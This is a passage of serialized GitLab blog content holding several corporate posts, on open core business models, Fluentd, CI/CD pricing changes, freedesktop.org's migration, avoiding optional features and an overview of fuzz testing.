Here are some success stories from our community to inspire you:\n* Dave Barr wrote about [“Why new software engineers should contribute to GitLab”](https://davebarr.dev/why-new-software-engineers-should-contribute-to-gitlab/)\n\n* [You’re hired! Two GitLab contributors turn their success into full-time engineering roles](/blog/you-are-hired-two-gitlab-contributors-turn-their-success-into-full-time-engineering-roles/)",[9,685,267],{"slug":1901,"featured":6,"template":689},"first-time-open-source-contributor-5-things-to-get-you-started","content:en-us:blog:first-time-open-source-contributor-5-things-to-get-you-started.yml","First Time Open Source Contributor 5 Things To Get You Started","en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started.yml","en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started",{"_path":1907,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1908,"content":1914,"config":1920,"_id":1922,"_type":14,"title":1923,"_source":16,"_file":1924,"_stem":1925,"_extension":19},"/en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core",{"title":1909,"description":1910,"ogTitle":1909,"ogDescription":1910,"noIndex":6,"ogImage":1911,"ogUrl":1912,"ogSiteName":673,"ogType":674,"canonicalUrls":1912,"schema":1913},"5 Ways to resist the threat of service-wrapping with buyer-based open core","Commercial open source businesses are at risk of commoditization by hypercloud providers – here are some ways to avoid the trap.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680537/Blog/Hero%20Images/osls-buyer-based-open-source.jpg","https://about.gitlab.com/blog/five-ways-resist-service-wrapping-buyer-based-open-core","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 Ways to resist the threat of service-wrapping with buyer-based open core\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n     
   \"datePublished\": \"2019-04-03\",\n      }",{"title":1909,"description":1910,"authors":1915,"heroImage":1911,"date":1917,"body":1918,"category":10,"tags":1919},[1916],"Vanessa Wegner","2019-04-03","\n\nGitLab makes money as a commercial open source software (COSS) business. As you\nmight imagine, open source is at risk of becoming commoditized, just by its\ninherent characteristic of being completely … open. In today’s age of hyperclouds,\nopen source businesses are under threat of [service-wrapping via cloud\nproviders like Amazon](https://aws.amazon.com/blogs/aws/new-open-distro-for-elasticsearch/), Microsoft, and Google.\n\nTo avoid commoditization, [GitLab has tried a number of business models](/blog/monetizing-and-being-open-source/), from\ndonations to consultancy to single-tenant service, but none of them worked.\nFinally, we settled on open core. At this year’s Open Source Leadership Summit,\nour CEO [Sid Sijbrandij](/company/team/#sytses) talked about where GitLab has hedged its bet to avoid becoming obsolete.\nAs Sid describes in the presentation below, there are five key methods for resisting\ncommoditization with buyer-based open core.\n\n## Watch the presentation\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/G6ZupYzr_Zg\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Key takeaways\n\n### What is buyer-based open core?\n\nBuyer-based means that GitLab offers [four different tiers of the software](/pricing/), which offer different functionality based\non what each buyer persona needs.\n\n### How do you generate revenue with buyer-based open core?\n\nEach tier focuses on what the buyer wants – and nothing more. It is also priced\naccordingly. 
Those at a higher level in the organization often have more budget\nauthority – so they can spend budget on what provides value for them.\n\n### How can COSSes avoid commoditization?\n\n1. Insert proprietary functionality in a majority of your use cases.\n1. Offer many proprietary features.\n1. Offer interaction through a user interface, rather than through APIs.\n1. Cater to price-insensitive buyers.\n1. Attract users that rarely contribute to open source.\n\nLearn more about these best practices and how GitLab has implemented them by\n[watching Sid’s presentation](https://youtu.be/G6ZupYzr_Zg), or viewing his slides below:\n\n\u003Cfigure class=\"video_container\">\n\u003Ciframe src=\"https://docs.google.com/presentation/d/e/2PACX-1vRzKYXPPenZlKkbun3AklJP-xgrC4ga-AqBRyVxOAs2tczZ1VNNUGriYy0vF8iBccuT58rDcwateT3P/embed?start=false&loop=false&delayms=3000\" frameborder=\"0\" width=\"960\" height=\"569\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\">\u003C/iframe>\n\u003C/figure>\n\nCover image by [Nastuh Abootalebi](https://unsplash.com/@sunday_digital) on\n[Unsplash](https://unsplash.com/photos/eHD8Y1Znfpk)\n{: .note}\n",[267,9,803],{"slug":1921,"featured":6,"template":689},"five-ways-resist-service-wrapping-buyer-based-open-core","content:en-us:blog:five-ways-resist-service-wrapping-buyer-based-open-core.yml","Five Ways Resist Service Wrapping Buyer Based Open Core","en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core.yml","en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core",{"_path":1927,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1928,"content":1934,"config":1939,"_id":1941,"_type":14,"title":1942,"_source":16,"_file":1943,"_stem":1944,"_extension":19},"/en-us/blog/fluentd-using-gitlab-ci-cd",{"title":1929,"description":1930,"ogTitle":1929,"ogDescription":1930,"noIndex":6,"ogImage":1931,"ogUrl":1932,"ogSiteName":673,"ogType":674,"canonicalUrls":1932,"schema":1933},"Thanks Fluentd for 
betting on GitLab CI/CD!","We're happy to support fresh CNCF graduate Fluentd with GitLab CI/CD, and excited about their latest innovation offering stream processing on the edge.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678614/Blog/Hero%20Images/gitlab-fluentd.png","https://about.gitlab.com/blog/fluentd-using-gitlab-ci-cd","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Thanks Fluentd for betting on GitLab CI/CD!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2019-05-21\",\n      }",{"title":1929,"description":1930,"authors":1935,"heroImage":1931,"date":1936,"body":1937,"category":10,"tags":1938},[1032],"2019-05-21","\nFluentd, the [latest project to graduate](https://www.fluentd.org/blog/fluentd-cncf-graduation) in the CNCF, announced on stage at KubeCon Barcelona today that it is using [GitLab CI/CD](/solutions/continuous-integration/) for continuous integration. We are thrilled about the shout out and honored to support such an influential and innovative project.\n\nFor those who haven’t yet worked with Fluentd, it is an [open source data collector](https://www.fluentd.org/architecture), which lets you unify the data collection and consumption for a better use and understanding of data. Fluent Bit is their lighter-weight forwarder for those with exacting memory requirements. The project sports 7,868 stars on GitHub and their community has contributed more than 900 contributed plugins. They witness more than 100K downloads a day!\n\nThe latest innovation from Fluentd around [stream processing on the edge](https://docs.fluentbit.io/stream-processing/) can be very useful for our industry. 
As many of those who monitor large-scale, complex, distributed systems, run IoT businesses, or build smart cities will attest, more and more data is generated by these systems and analysis often needs to happen blazingly fast to be meaningful. The standard data analysis model, where it is first stored and indexed in a database (presumably in some cloud) and then analyzed, is not good enough for some real-time and complex analysis needs. The latencies associated with such data transfer may not be able to support applications involving time-critical, data-driven decision making. With Fluent bit, the Fluent team is looking to process the data while it's still in motion in the Log processor – bringing a lot of advantages of speed.\n\nWhile I am reading papers by others attempting to build stream processing on the edge, I find Fluentd’s efforts exciting because they already have major community traction and are part of companies’ observability workflows for logging. The [CNCF graduation criteria](https://github.com/cncf/toc/blob/master/process/graduation_criteria.adoc) that Fluentd met will further embolden enterprises to try it out, as part of the requirements are a diverse contributor community and security audits.\n\nWe've spent the past few months collaborating with Fluentd on their CI needs, and it's been very educational for us. We learned about the unique challenges that fast-moving projects in the CNCF face, and how we can be of assistance with our CI/CD offering. A large part of the answer is providing clear and consistent guidance around converting pipelines and then supporting the projects to success. 
If you are a CNCF project interested in working with GitLab CI/CD, holler at us and we’d be delighted to help.\n\nUntil then, enjoy KubeCon Barca!\n",[109,9,1037,845,277,1038],{"slug":1940,"featured":6,"template":689},"fluentd-using-gitlab-ci-cd","content:en-us:blog:fluentd-using-gitlab-ci-cd.yml","Fluentd Using Gitlab Ci Cd","en-us/blog/fluentd-using-gitlab-ci-cd.yml","en-us/blog/fluentd-using-gitlab-ci-cd",{"_path":1946,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1947,"content":1952,"config":1958,"_id":1960,"_type":14,"title":1961,"_source":16,"_file":1962,"_stem":1963,"_extension":19},"/en-us/blog/free-period-for-cicd-external-repositories",{"title":1948,"description":1949,"ogTitle":1948,"ogDescription":1949,"noIndex":6,"ogImage":1211,"ogUrl":1950,"ogSiteName":673,"ogType":674,"canonicalUrls":1950,"schema":1951},"The free period of CI/CD for GitHub is ending soon","The free-of-charge use of CI/CD for GitHub is ending soon, so you'll need to upgrade to continue using this feature.","https://about.gitlab.com/blog/free-period-for-cicd-external-repositories","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The free period of CI/CD for GitHub is ending soon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Parker Ennis\"}],\n        \"datePublished\": \"2020-03-12\",\n      }",{"title":1948,"description":1949,"authors":1953,"heroImage":1211,"date":1955,"body":1956,"category":930,"tags":1957},[1954],"Parker Ennis","2020-03-12","\n\n[CI/CD for GitHub](/solutions/github/) is a feature that lets you use any Git-based repository as a host in combination with GitLab CI/CD regardless of where your source code lives – [GitHub](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/github_integration.html), [Bitbucket](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/bitbucket_integration.html), or any other Git server. 
To introduce this feature to the large number of users with private repos hosted on GitHub.com, we made it available to users [free of charge](/blog/six-more-months-ci-cd-github/) for a limited time only.\n\nWe then [extended the free period](/blog/ci-cd-github-extended-again/) for an additional limited time. We’ve set the final end date for this free period for March 22, 2020.\n\nIf you wish to continue using [CI/CD for private external repositories](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/index.html) past March 22, 2020, you will need to upgrade your plan to at least a [Silver plan](/pricing/).\n\nOf course, you always have the option of migrating your project to [GitLab.com](https://docs.gitlab.com/ee/user/project/import/github.html). As part of our commitment to our value of transparency and open source, all public repositories on GitLab.com get all of the features in our top-tier Gold plan for free. If your repo on GitHub.com is public, then it gets mirrored to GitLab.com as a public repo and you have access to CI/CD capabilities.\n\nNote: If you are only using [repository mirroring](https://docs.gitlab.com/ee/user/project/repository/repository_mirroring.html#pulling-from-a-remote-repository) without CI/CD then you only need a Bronze plan to continue using this functionality.\n\nSo, what exactly does this mean for you?\n\n*  The ability to mirror private external repositories and run CI/CD on them will no longer be available as of March 22, 2020, unless the repositories have been made public or you have upgraded to an eligible GitLab plan.\n*  Since [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) can only be published through GitLab CI, users who were using a GitHub repository with private projects and haven't upgraded to an eligible GitLab plan will be unable to have private pages.\n\nWe've designed this process to be a smooth transition for our users. 
If you have any additional questions about the change, or how this impacts you and your teams, please don’t hesitate to reach out:\n*  For general questions or pricing inquiries, please contact our **[Sales team](/sales/)**.\n*  For technical questions or concerns, please review our **[Support options](/support/)**.\n\nThanks!\n",[109,685,267,9],{"slug":1959,"featured":6,"template":689},"free-period-for-cicd-external-repositories","content:en-us:blog:free-period-for-cicd-external-repositories.yml","Free Period For Cicd External Repositories","en-us/blog/free-period-for-cicd-external-repositories.yml","en-us/blog/free-period-for-cicd-external-repositories",{"_path":1965,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1966,"content":1972,"config":1977,"_id":1979,"_type":14,"title":1980,"_source":16,"_file":1981,"_stem":1982,"_extension":19},"/en-us/blog/freedesktop-org-migrates-to-gitlab",{"title":1967,"description":1968,"ogTitle":1967,"ogDescription":1968,"noIndex":6,"ogImage":1969,"ogUrl":1970,"ogSiteName":673,"ogType":674,"canonicalUrls":1970,"schema":1971},"Welcome to GitLab, freedesktop.org!","Freedesktop.org, the home of open source desktop technology development, has migrated to GitLab to improve their workflow and modernize their service.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671252/Blog/Hero%20Images/gitlab-desktop-org-cover.png","https://about.gitlab.com/blog/freedesktop-org-migrates-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Welcome to GitLab, freedesktop.org!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-08-20\",\n      }",{"title":1967,"description":1968,"authors":1973,"heroImage":1969,"date":1974,"body":1975,"category":10,"tags":1976},[1859],"2018-08-20","\nSorry to [keep banging on about it](/blog/drupal-moves-to-gitlab/), but we get pretty excited when 
[open source projects](/blog/welcome-gnome-to-gitlab/) tell us they’re [#movingtogitlab](/blog/movingtogitlab/). There’s always more room at our inn. So we’re very happy to welcome [freedesktop.org](https://www.freedesktop.org/wiki/) into the fold! We chatted to Daniel Stone, project administrator, about what the project does and why they’re joining us.\n\n## Q & A\n\n- [What is freedesktop.org?](#what-is-freedesktoporg)\n- [How is freedesktop.org used?](#how-is-fdo-used)\n- [What's the connection between freedesktop.org, X Window System, and Linux?](#whats-the-connection-between-fdo-x-window-system-and-linux)\n- [How many contributors work on the project?](#how-many-contributors-work-on-the-project)\n- [Why would someone use freedesktop.org instead of macOS or Microsoft Windows?](#why-would-someone-use-fdo-instead-of-macos-or-microsoft-windows)\n- [Why are you migrating to GitLab?](#why-are-you-migrating-to-gitlab)\n- [How are you anticipating the move to be beneficial?](#how-are-you-anticipating-the-move-to-be-beneficial)\n\n### What is freedesktop.org?\n\nCreated in 2000 by Havoc Pennington (a GNOME developer), freedesktop.org (or fd.o) is a [forge](https://en.wikipedia.org/wiki/Forge_(software))-type hosting site. The idea was to create a neutral collaboration space between [GNOME](/blog/welcome-gnome-to-gitlab/), [KDE](/blog/welcome-kde/), Enlightenment, and other open source desktops. Unlike integrated systems, like Windows and macOS, the open source desktop lacks a lot of shared foundations: what should you open files with, how should you manage windows, and so forth.\n\nOriginally fd.o was a home for these desktop developers to collaborate on common standards, so programs could run portably with the same functionality across different desktops. In 2004, xwin.org was formed by a group of open source graphics developers unhappy with the closed-shop state of the XFree86 project. 
The two projects of fd.o and xwin.org merged shortly after xwin.org’s founding, with fd.o playing host to the X.Org Foundation, which supervises and facilitates the ongoing development of the graphics stack.\n\nOver the years since, our role as a neutral home for all sorts of desktop technology development has seen us add projects such as GStreamer, LibreOffice, and PulseAudio to our diverse family. Some projects such as systemd and Flatpak originally began their development on fd.o, but moved out to other hosting platforms which better suited their needs and workflow.\n\n### How is fd.o used?\n\nMost of our projects are invisible to users: NetworkManager is probably responsible for driving your Wi-Fi under the hood, though you’re unlikely to interact with it directly. Mesa and Wayland/X.Org will provide the underlying plumbing to render your games and your whole UI, but these are mostly invisible. Your desktop probably leans heavily on the D-Bus message-passing system. Most of it is plumbing.\n\n### What's the connection between fd.o, X Window System, and Linux?\n\nAs part of the graphics stack, fd.o hosts the development of the Linux kernel’s graphics development: drivers from all vendors part of the mainstream kernel (and some which aren’t yet!) use our Git hosting, mailing lists, bug tracking, and other services to build the core kernel graphics infrastructure. All this development happens on our infrastructure, which is then fed into the core Linux kernel during its \"merge window\" every release.\n\nThe X.Org Foundation tries to enable the work of a wide body of open source graphics projects. Originally X.Org itself was just the X Window System, but over the years the code evolved out of X.Org into a number of enabling projects. 
These include not just alternative window systems such as Wayland, the Mesa 3D graphics library for hardware-accelerated OpenGL, OpenGL ES and Vulkan, Cairo and Pixman for software rendering, libinput for input device handling, and much more. We play host to all those projects, with the Foundation providing an accountable body for administrative work, conference organization, and so on.\n\nOther freedesktop.org projects, as said before, provide all the glue around the margins of your desktop. Providing a database of available applications and preferred MIME type handlers, network device management, inter-process communication, a PDF renderer; in general, all the things we can do well in one place, to enable people who want to write desktop environments to focus on the thing that matters to them: building the actual desktop!\n\nAs part of this, we’ve always tried to stay strenuously vendor-neutral and also project-neutral within the desktop community. Rather than \"picking winners\" or enforcing directions on external projects, we try to slowly and gently build consensus as a neutral forum.\n\n### How many contributors work on the project?\n\nHard to say! We have around 1,300 registered users who directly commit to our family of projects. Not all of them are active of course, but many developers do not have direct commit access and aren’t represented in that figure. We have around 25,000 people subscribed to our various development mailing lists.\n\n### Why would someone use fd.o instead of macOS or Microsoft Windows?\n\nMuch like GitLab, freedesktop.org is an open source, open-participation, neutral platform. Running an open source desktop through distributions such as Arch, Debian, Fedora, or Ubuntu – all of which use our enabling technology – gives the user a fully open source system. 
This is incredibly empowering: as a user, you have the ability to dive into any part of your system, make the changes you want to see, and participate openly in these projects to see your improvements work upstream.\n\n>As a user, you have the ability to dive into any part of your system, make the changes you want to see, and participate openly in these projects to see your improvements work upstream\n\n### Why are you migrating to GitLab?\n\nOver the years fd.o has been running, we’ve accumulated a wide variety of services: our LDAP-based account system forked back in 2004, Bugzilla for issue tracking, Mailman for mailing lists, cgit and hand-rolled Git hosting, Patchwork for pulling patches from the mailing list when they are submitted for review, Jenkins for build infrastructure, ikiwiki for project wikis, still an FTP server somewhere; the list goes on.\n\nIn terms of workflow, we simply can’t provide some of our projects the workflow they want with this infrastructure. Over the years since we begun, the norm of software development has moved from throwing patches around via email, to fully distributed version control with integrated review and issue tracking, and so on. On paper we provide those services, but integration between them involves a lot of duct tape, and this shows to the users. We saw multiple projects either leave fd.o and move to alternate hosting platforms, or just not develop on our infrastructure to begin with, because we weren’t offering anything like the same level of functionality and convenience as those services.\n\n>Over the years, the norm of software development has moved from throwing patches around via email, to fully distributed version control with integrated review and issue tracking, and so on. 
On paper we provide those services, but integration between them involves a lot of duct tape, and this shows to the users.\n\nOne of the issues with freedesktop.org being such a diverse family, is that there is no central driven organization behind it. The site is currently run by three volunteers, all of whom keep the site running in our spare time. Maintaining all these services – many of them forked to add now-essential features like spam prevention, as well as our own custom local work for service integration – takes a surprising amount of time, to the point where just keeping it running is about all we can do. Actual improvements are very difficult to implement in the time we have, and even when we can do them, making sure all our projects can take full advantage of them is sometimes too much for us.\n\n### How are you anticipating the move to be beneficial?\n\nFirstly, for the workflow, having linked repository management, issue tracking, code review, CI pipelines and feedback, container repositories, wikis, and websites, provides functionality we couldn’t before – or at least, we were providing a pale imitation of it. As all of this is provided in [GitLab Core](/pricing/) and backed by a single coherent permission model, we are able to open these services up to our member projects who can work with them autonomously, rather than waiting for the admins to deal with services for them.\n\nFrom an admin point of view, having a single application which takes care of all of this will drastically reduce the time we spend treading water and dealing with the impedance mismatch between the disparate services we’ve had until now. 
Bringing GitLab up on Kubernetes has not been without its challenges as we attempt to bring our service administration skills up into the 21st century, but already it’s shown us that we can move drastically quicker than we have been able to in the past.\n\n>From an admin point of view, having a single application which takes care of our entire workflow will drastically reduce the time we spend treading water and dealing with the impedance mismatch between the disparate services we’ve had until now\n\nIn terms of service modernization, another huge improvement is a modern approach to identity and security. Running an open community site in 2018 is not a fun place to be: not just keeping on top of security vulnerabilities, but targeted break-in attempts and spam. A lot of our previous services aren’t designed to deal with this kind of abuse. Having a single identity service on GitLab – which can link to external identity providers such as Google and GitLab.com, and make use of two-factor authentication – is a huge leap forward for us. Similarly, a coherent approach to spam which doesn’t involve spending an evening trawling through SQL tables by hand makes dealing with spam actually practical!\f\n\n### How can people get involved?\n\nSince we are an umbrella of diverse projects, there's no single answer. 
We keep a [list of our active projects on our website](https://www.freedesktop.org/wiki/GettingInvolved/): pick the one that's closest to your heart, check out their site and repo, and send your first MR.\n",[9,267,910,686],{"slug":1978,"featured":6,"template":689},"freedesktop-org-migrates-to-gitlab","content:en-us:blog:freedesktop-org-migrates-to-gitlab.yml","Freedesktop Org Migrates To Gitlab","en-us/blog/freedesktop-org-migrates-to-gitlab.yml","en-us/blog/freedesktop-org-migrates-to-gitlab",{"_path":1984,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1985,"content":1991,"config":1997,"_id":1999,"_type":14,"title":2000,"_source":16,"_file":2001,"_stem":2002,"_extension":19},"/en-us/blog/friends-dont-let-friends-add-options-to-code",{"title":1986,"description":1987,"ogTitle":1986,"ogDescription":1987,"noIndex":6,"ogImage":1988,"ogUrl":1989,"ogSiteName":673,"ogType":674,"canonicalUrls":1989,"schema":1990},"Friends don't let friends add options to code","Creating optional features burdens users and applications – here's how we avoid adding options.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678953/Blog/Hero%20Images/options.jpg","https://about.gitlab.com/blog/friends-dont-let-friends-add-options-to-code","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Friends don't let friends add options to code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Suri Patel\"}],\n        \"datePublished\": \"2018-12-10\",\n      }",{"title":1986,"description":1987,"authors":1992,"heroImage":1988,"date":1994,"body":1995,"category":801,"tags":1996},[1993],"Suri Patel","2018-12-10","\nSometimes, when trying to make it easier to work in an application, our instinct is to add\noptional features that users can enable if their situations require a specific functionality.\nOur intentions may be good, but these actions can actually cause _more_ problems, since we invite 
users\n to second-guess their choices by adding extra steps into the user experience.\n\n## The disadvantages of a [choose your own adventure](https://en.wikipedia.org/wiki/Choose_Your_Own_Adventure) model\n\nOne of the most celebrated aspects of [open source](/solutions/open-source/)\nis the freedom that allows developers to brighten a user’s day by adding an\noptional feature that may not be for everyone, but allows a small portion of users\nto engage with a project in a specific way. While it may seem like a great idea\nto cater to individual needs, there are several disadvantages to making something\nan option.\n\n### It creates more work for developers\n\nCreating extra options means more work for both frontend and backend teams.\nThese features add additional code, tests, and documentation for each setting,\nand the various states alter the UI. Adding options hurts you in every step of\nthe development process.\n\n### It places a burden on the user to choose\n\nWhen we solve problems by including options, we force a user to think about the\nfunction and consider its purpose and drawbacks, placing a burden on them to\ncontrol how they use an application. A user hesitates and has to make a decision\nabout whether this is something that should be enabled. After all, if an option\nsignificantly enhanced the user experience, then wouldn’t it have been automatically\nintegrated?\n\n### It makes future functionality more difficult to implement\n\nThere's also the long-term impact of additional options. Just one extra option can lead to one of two\npaths, which might influence other parts of an application. So, every\ntime we add an option, the number of states of the application doubles. That's\nexponential growth and it adds up quickly, making it harder to diagnose errors. 
Multiple\noptions can lead to the creation of states of which we’re unaware, so\nit’s harder for the user to understand how an application should behave, because\nthey don't know whether errors are due to an option or not. And, if it is an\noption causing the error, _which_ option is the problem?\n\n## How we avoid adding options: Bask in the glow of iteration\n\nSo, how do you know if a feature should be optional or not? At GitLab, we ship\nthe first [iteration](https://handbook.gitlab.com/handbook/values/#iteration) and keep delivering based on\nuser feedback. Some of the features that we anticipated may never roll out,\nbecause users didn’t request them. Iteration allows us to reduce the scope of\ndevelopment and avoid including features that aren’t popular or useable.\n\nWhenever users need something new, try to create a solution that's acceptable\nfor the most number of people. Rely on your development and operations teams to\nprovide feedback and ask them to relate to the end user. Conducting\n[UX research](/handbook/product/ux/ux-research/#ux-research) with your users\nalso helps identify pain points and needs.\n\nTeams are continually constrained by development capacity, and adding options to\napplications can absorb previous time and effort. We suggest shipping your\napplication without an option and waiting to see whether people request it or\nmake a\n[feature proposal](https://gitlab.com/gitlab-org/gitlab-ce/issues?label_name%5B%5D=feature+proposal)\nfor it. 
In the end, our role is to solve users’ problems, and our goal is to\nidentify the underlying cause of a challenge and fix it in a way that doesn't\nneed an option.\n\n[Cover image](https://unsplash.com/photos/pKeF6Tt3c08) by [Brendan Church](https://unsplash.com/@bdchu614) on Unsplash\n{: .note}\n",[803,730,9,686],{"slug":1998,"featured":6,"template":689},"friends-dont-let-friends-add-options-to-code","content:en-us:blog:friends-dont-let-friends-add-options-to-code.yml","Friends Dont Let Friends Add Options To Code","en-us/blog/friends-dont-let-friends-add-options-to-code.yml","en-us/blog/friends-dont-let-friends-add-options-to-code",{"_path":2004,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2005,"content":2011,"config":2017,"_id":2019,"_type":14,"title":2020,"_source":16,"_file":2021,"_stem":2022,"_extension":19},"/en-us/blog/fuzz-testing",{"title":2006,"description":2007,"ogTitle":2006,"ogDescription":2007,"noIndex":6,"ogImage":2008,"ogUrl":2009,"ogSiteName":673,"ogType":674,"canonicalUrls":2009,"schema":2010},"How recent acquisitions introduce fuzz testing to GitLab","Learn more about fuzz testing and GitLab's recent acquisitions in the space.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681436/Blog/Hero%20Images/peaches2.jpg","https://about.gitlab.com/blog/fuzz-testing","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How recent acquisitions introduce fuzz testing to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sam Kerr\"}],\n        \"datePublished\": \"2020-07-17\",\n      }",{"title":2006,"description":2007,"authors":2012,"heroImage":2008,"date":2014,"body":2015,"category":930,"tags":2016},[2013],"Sam Kerr","2020-07-17","\n\n{::options parse_block_html=\"true\" /}\n\nGitLab recently acquired two of the leading companies in the fuzz testing space - [Peach Tech](http://peach.tech/) and\n[Fuzzit](https://fuzzit.dev/)! 
These two companies bring amazing technology into GitLab. Read on the learn more about the technology and how you can easily integrate fuzz testing into your workflow.\n\n## What is fuzz testing?\nFuzz testing is a powerful way to test your apps to find security issues and\nflaws in business logic that traditional QA methods miss. Fuzz testing works by passing\nrandomly generated inputs to your app, and assesses the results.\n\nWhen the app being tested crashes or behaves in an unexpected way, this is\ncalled a \"fault.\" When a fault is discovered, that means there is a way for a user to provide a\nsimilar, but potentially malicious, input to your app in a production environment to crash or\nexploit it. Discovering faults lets you track down bugs in your code that\nyou wouldn't find otherwise and lets you fix them before an attacker can exploit these weaknesses.\n\nThere are a few different methods for fuzz testing. The two primary\nmethods are what we call \"coverage-guided\" fuzz testing and \"behavioral\"\nfuzz testing. Fuzzit and Peach Tech bring these to Gitlab, respectively. Both methods approach fuzz testing differently.\nCoverage-guided fuzz testing leverages the [source code](/solutions/source-code-management/) and instrumented versions\nof the app to be able to observe the app as it is running and dynamically make\nnew tests during a fuzz testing session to exercise new parts of the app to find bugs. Behavioral fuzzing\ntakes a specification of how the app is _supposed_\nto work and tries random inputs to test how it actually works - which usually\nwill find bugs and security issues. Coverage-guided fuzzing and behavioral fuzzing have unique\nadvantages and disadvantages, which is why GitLab aims to offer our users both options\nso you can choose the right one (or both!) 
for your use case.\n\n## What makes GitLab’s fuzz testing special?\nTraditionally, fuzz testing has been difficult to set up and hard get results from.\nSome of the challenges with fuzz testing include assembling complex testing harnesses to run the fuzz tests and sorting through large amounts of results, including false positives. These challenges can make it time consuming and challenging to get meaningful results from fuzz testing.\nBringing Peach Tech and Fuzzit fuzz testing techniques into the existing GitLab\nworkflow means users can take advantage of the powerful benefits of fuzz\ntesting without any of the traditional difficulties associated with fuzz testing.\nBy bringing these two technologies into GitLab, we will make it easy for users to integrate fuzz testing into their workflows and present results in a meaningful and actionable way.\n\n![Preview of fuzz testing results in an MR](https://about.gitlab.com/images/blogimages/fuzzing_image.png){: .shadow}\nPreview of fuzz testing results in an MR.\n{: .note.text-center}\n\nGitLab will make fuzz testing part of our existing workflow\nso users do not need to use an external tool or interface. Instead, users simply include\na CI job template to use the fuzz testing engines from Fuzzit and Peach Tech. Results will appear inline for developers, alongside the\nother build and test outputs they use today.\n\n## What about open source?\nOpen source is near and dear to our hearts at GitLab. We recently [moved several\nfeatures](/blog/new-features-to-core/) to\nour open source offering. We’ll continue supporting open source\nwith fuzz testing as well. We have published several of our fuzz testing\nengines as open source, so they are accessible to any user and everyone can contribute. 
This will\ninclude several of the language-specific coverage-guided [fuzz testing engines](https://gitlab.com/groups/gitlab-org/security-products/analyzers/fuzzers)\nas well as [Peach Tech Community Edition](https://gitlab.com/peachtech/peach-fuzzer-community). In the future, we will consider what\nnew fuzz testing pieces we can open source to the community as we build new\ncapabilities for different use cases. One area we are considering is what we\ncan do as we eventually move into [protocol fuzz testing](https://gitlab.com/gitlab-org/gitlab/-/issues/229275). Watch this space!\n\n## When can I get it?\nGitLab will release the minimal version of fuzz testing [later this year](/direction/maturity/#secure)\nas part of GitLab Ultimate. This release will enable behavioral-guided fuzz testing of\nweb APIs that follow the [OpenAPI](https://swagger.io/specification/) specification standard. We will also be\nenabling coverage-guided fuzz testing on apps written in a variety of languages,\nstarting with Go.\n\n## What’s next?\nGitLab is excited to add fuzz testing to the already large suite of\n[application security scanners](/topics/devsecops/) in GitLab’s [Secure stage](/stages-devops-lifecycle/secure/)\nand make it part of\nthe GitLab workflow that developers use already. This makes it easy to shift security\nleft and take advantage of the benefits of fuzz testing.\n\nAs we mature our fuzz testing offering, we will make\nintegrating fuzz testing results into new parts of the workflow a priority. So GitLab developers\ncan directly view fuzz testing results and fix any issues they find. We will also focus on enabling advanced\nconfiguration options for users who want to customize their fuzz tests.\nFinally, we will be expanding fuzz testing to address\nadditional use cases, beyond just web apps and APIs. 
You can read more about\nour plans for maturing fuzz testing on our [direction page](/direction/secure/dynamic-analysis/fuzz-testing/).\n\nCover image by [Ian Baldwin](https://unsplash.com/@ianebaldwin) on [Unsplash](https://unsplash.com/photos/f7FwHomDgzg)\n{: .note}\n",[1099,9,865],{"slug":2018,"featured":6,"template":689},"fuzz-testing","content:en-us:blog:fuzz-testing.yml","Fuzz Testing","en-us/blog/fuzz-testing.yml","en-us/blog/fuzz-testing",{"_path":2024,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2025,"content":2031,"config":2036,"_id":2038,"_type":14,"title":2039,"_source":16,"_file":2040,"_stem":2041,"_extension":19},"/en-us/blog/generic-semantic-version-processing",{"title":2026,"description":2027,"ogTitle":2026,"ogDescription":2027,"noIndex":6,"ogImage":2028,"ogUrl":2029,"ogSiteName":673,"ogType":674,"canonicalUrls":2029,"schema":2030},"SemVer versioning: how we handled it with linear interval arithmetic","SemVer versioning made it difficult to automate processing. We turned to linear interval arithmetic to come up with a unified, language-agnostic semantic versioning 